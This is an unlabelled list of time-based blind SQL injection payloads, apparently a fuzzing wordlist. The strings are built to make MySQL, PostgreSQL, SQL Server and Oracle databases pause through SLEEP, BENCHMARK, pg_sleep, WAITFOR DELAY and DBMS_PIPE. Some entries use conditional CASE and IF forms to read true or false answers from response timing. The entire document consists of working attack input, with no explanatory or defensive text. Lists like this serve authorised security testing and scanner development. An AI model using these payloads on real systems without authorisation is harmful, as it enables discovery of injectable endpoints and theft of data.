'; WAITFOR DELAY '0:0:5'--
' OR SLEEP(5)--
'; SELECT pg_sleep(5)--
' AND SLEEP(5) AND '1'='1
1; WAITFOR DELAY '0:0:5'--
1 OR SLEEP(5)
' OR pg_sleep(5)--
') OR SLEEP(5)--
' AND SLEEP(5)--
" AND SLEEP(5)--
' AND SLEEP(5)#
1' AND SLEEP(5)--
1" AND SLEEP(5)--
') AND SLEEP(5)--
')) AND SLEEP(5)--
' OR BENCHMARK(50000000,MD5(1))--
1 OR BENCHMARK(50000000,MD5(1))
' AND BENCHMARK(50000000,MD5(1))--
' AND IF(1=1,SLEEP(5),0)--
1 AND IF(1=1,SLEEP(5),0)--
' OR IF(1=1,SLEEP(5),0)--
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--
'; SELECT CASE WHEN (1=2) THEN pg_sleep(5) ELSE pg_sleep(0) END--
' AND 1=(SELECT 1 FROM PG_SLEEP(5))--
'; EXEC sp_executesql N'WAITFOR DELAY ''0:0:5'''--
1;SELECT DBMS_PIPE.RECEIVE_MESSAGE('a',5) FROM DUAL--
' OR 1=1 AND SLEEP(5)--